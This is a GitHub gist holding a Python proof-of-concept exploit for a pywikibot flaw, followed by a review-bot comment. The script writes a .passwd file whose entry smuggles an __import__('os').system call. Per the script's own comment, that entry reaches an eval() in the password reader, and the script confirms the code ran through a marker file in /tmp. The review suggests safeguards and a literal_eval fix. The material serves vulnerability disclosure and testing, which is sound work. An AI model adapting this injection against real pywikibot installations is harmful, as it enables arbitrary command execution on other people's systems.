Created
November 25, 2025 13:29
aydinnyunus created this gist
Nov 25, 2025
@@ -0,0 +1,45 @@ #!/usr/bin/env python3 import os import uuid from pathlib import Path # Change to PoC directory poc_dir = Path(__file__).parent os.chdir(poc_dir) # Generate random exploit file name exploit_filename = f'pwb_rce_{uuid.uuid4().hex[:8]}.txt' exploit_file = Path(f'/tmp/{exploit_filename}') # Create .passwd file with malicious code passwd_content = f"""# Normal password entry ('testuser', 'testpass') # Malicious code injection ('en', 'wikipedia', 'victim', __import__('os').system('touch /tmp/{exploit_filename} && echo "RCE SUCCESSFUL" > /tmp/{exploit_filename}')) """ (poc_dir / '.passwd').write_text(passwd_content, encoding='utf-8') os.chmod(poc_dir / '.passwd', 0o600) # Import pywikibot - triggers password file parsing import pywikibot from pywikibot.login import LoginManager # Create fake site to avoid network calls class FakeSite: def __init__(self): self.code = 'en' self.family = type('FakeFamily', (), {'name': 'wikipedia'})() pywikibot.Site = lambda *args, **kwargs: FakeSite() # This triggers readPassword() which uses eval() on line 255 LoginManager() # Check if RCE was successful if exploit_file.exists(): print("[!] RCE SUCCESSFUL!") print(f"[!] File created: {exploit_file}") print(f"[!] Contents: {exploit_file.read_text()}") else: print("[*] Exploit file not found")
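Review bot: The `(poc_dir / '.passwd').write_text(...)` call overwrites any `.passwd` already sitting next to the script, and nothing afterwards removes that file or the marker under `/tmp`, so a run inside a real pywikibot working directory would replace stored credentials and leave the injected line behind. A guard before the write, such as `if (poc_dir / '.passwd').exists(): raise SystemExit('refusing to overwrite existing .passwd')`, plus deleting both files at the end, would keep the demonstration contained. The comment `# This triggers readPassword() which uses eval() on line 255` should name the pywikibot release it was checked against, for example `# readPassword() in pywikibot <version tested> eval()s each password-file line`, since a bare line number drifts between versions. For readers assessing exposure: the script writes the file itself as the current user with mode `0o600`, so the practical risk depends on whether a less-trusted party can write to the password file. Parsing entries with `ast.literal_eval` rather than `eval` would presumably close the issue, but confirm that against the upstream source.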